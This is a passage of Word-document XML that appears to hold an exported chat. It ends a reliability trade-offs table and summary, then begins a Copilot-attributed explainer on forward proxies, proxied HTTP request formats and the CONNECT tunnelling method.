              <w:t>Consensus protocols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E42AE4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Latency + reduced availability during partitions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="1D67C50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8D52BF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Stronger isolation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AC4F36" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Lower throughput (more locking/aborting)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="6156F5D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FF5612" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>End-to-end verification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95BBEB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>CPU (checksums), complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="226930A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233B22" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:lastRenderedPageBreak/>
              <w:t>Testing/chaos engineering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A0805C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Engineering time, operational risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="285C583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7D1BDD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Progressive rollouts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A2BDE9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Deployment speed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="3A0F458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B0A472" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Backup/recovery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A1964A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Storage, operational overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76EA8801" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The golden rule:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Reliability is not free. Every reliability mechanism has a cost (performance, complexity, money, velocity). The engineering challenge is choosing the RIGHT level of reliability for each component based on its criticality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E709144" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="7721265E">
          <v:rect id="_x0000_i2951" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F819DC4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary — Mental Model for Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8E4DA9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1045FDA0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Reliability = Correctness × Durability × Consistency × Recoverability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681FA390" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="20D2AD3F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Correctness  → Transactions, idempotency, invariant checking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4D0CDF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Durability   → WAL, replication, erasure coding, backups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF3AFB0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">Consistency  → Consensus, isolation levels, conflict resolution  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A7C342" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Recoverability → Checkpoints, WAL replay, saga compensation, failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FAB063" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The ultimate insight:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> A reliable system is not one that never fails — that's impossible. A reliable system is one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC71601" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D14EF53" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Copilot said: # Proxy Servers — Deep Technical Breakdown --- ##</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572E363E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proxy Servers — Deep Technical Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E3C25D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="48EB1F31">
          <v:rect id="_x0000_i3051" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A43B76" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What a Proxy Server Actually Is (The Real Engineering Problem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3589D0E5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A proxy server is not simply a "middleman." That definition is so reductive it obscures the engineering depth entirely. A proxy is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">network entity that terminates one connection </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>and initiates another on behalf of the original communicating party</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>, with the ability to inspect, transform, route, cache, authenticate, or audit the traffic passing through it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031FAF6C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The critical word is </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>terminates</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. A proxy does not just forward packets — it is a full participant in the communication. It receives a complete connection from a client, reads the application-layer protocol (HTTP, HTTPS, SMTP, DNS, etc.), makes decisions based on the content, and initiates a new connection to the destination. This is what distinguishes a proxy from a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>router</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (which forwards packets without terminating connections) and from a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NAT device</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (which rewrites addresses but doesn't terminate connections at the application layer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7199679F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The engineering problems proxies solve are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2529311B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Indirection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The destination doesn't need to know who the real client is. The client doesn't need to know who the real destination is. Indirection enables anonymization, access control, load distribution, and topology hiding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384DAA68" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Interposition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> By sitting in the middle, the proxy can enforce policy — block certain content, require authentication, inject headers, rewrite responses, log traffic, encrypt or decrypt, and rate-limit — all without modifying either the client or the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168F2A35" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Protocol translation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The proxy can speak HTTP/1.1 to an old client and HTTP/2 to a modern backend. It can accept HTTPS from clients and forward HTTP internally. It bridges protocol versions and security boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D52DF3E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observability centralization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> All traffic flows through the proxy. Every request, response, latency, and error can be captured in one place — without instrumenting individual clients or servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4AF28A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Understanding proxy servers requires understanding the </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>different directions of proxying</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>, because forward proxies, reverse proxies, and transparent proxies have fundamentally different threat models, use cases, and internal mechanics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394767A2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="7F18668D">
          <v:rect id="_x0000_i3052" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="035F80FB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Forward Proxy — Client-Side Proxying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E3C978" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Fundamental Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB4C17C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>forward proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> acts on behalf of </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>clients</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. Clients explicitly configure their HTTP client, browser, or OS to send all requests to the proxy. The proxy then forwards those requests to the internet on the client's behalf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236F7111" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05515A71" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Client (configured to use proxy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D075C8C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    ↓  HTTP CONNECT / HTTP GET with absolute URI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7622E1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Forward Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5524D82B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    ↓  New connection to actual destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0185DFF0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Destination Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ECA666" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The client knows it's using a proxy. The destination server sees the proxy's IP, not the client's IP (unless the proxy adds X-Forwarded-For headers — more on this later).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB850FA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP Forward Proxying — The Protocol Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66075575" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For plain HTTP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42664867" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>When a browser is configured to use a proxy, HTTP requests change format. A normal HTTP request looks like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F45FF2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0211C087" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>GET /path/to/resource HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E13A6F3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Host: www.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F8A30D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A proxied HTTP request uses an </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>absolute URI</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (includes the full destination URL in the request line):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27941459" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DD6003" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>GET http://www.example.com/path/to/resource HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B95072" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Host: www.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514FFAE8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Proxy-Authorization: Basic dXNlcjpwYXNz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045979CA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The proxy reads the full URI, extracts the destination hostname and port, opens a TCP connection to www.example.com:80, and forwards a normal (non-proxied) HTTP request to it. The absolute URI format is how the proxy knows </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>where to forward the request</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — the client is telling the proxy the full destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A1F63F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Proxy-Authorization header</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> authenticates the client to the proxy — separate from any Authorization header that authenticates the client to the destination server. This allows the proxy to enforce access control independently of the destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B70D41D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The CONNECT Method — How HTTPS Works Through a Forward Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52860E83" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>HTTPS creates a fundamental challenge for forward proxies: if the connection is encrypted, the proxy can't read the HTTP request to know where to forward it. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CONNECT method</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> solves this by creating a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP tunnel</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> through the proxy before TLS negotiation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE79758" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step by step:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA6106A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="533"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client sends CONNECT request to proxy (unencrypted):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D09FAE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358AA2B7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>CONNECT www.example.com:443 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22910B6B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Host: www.example.com:443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316FBF8B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Proxy-Authorization: Basic dXNlcjpwYXNz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27140FC3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="534"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proxy validates the request:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Checks authorization, checks if the destination is allowed (access control list), checks if port 443 is permitted (some proxies only allow CONNECT to port 443 to prevent tunneling arbitrary TCP through the proxy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AD84A1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="534"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proxy establishes TCP connection to www.example.com:443.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C5F7B1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="534"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proxy responds to client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BC2E05" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
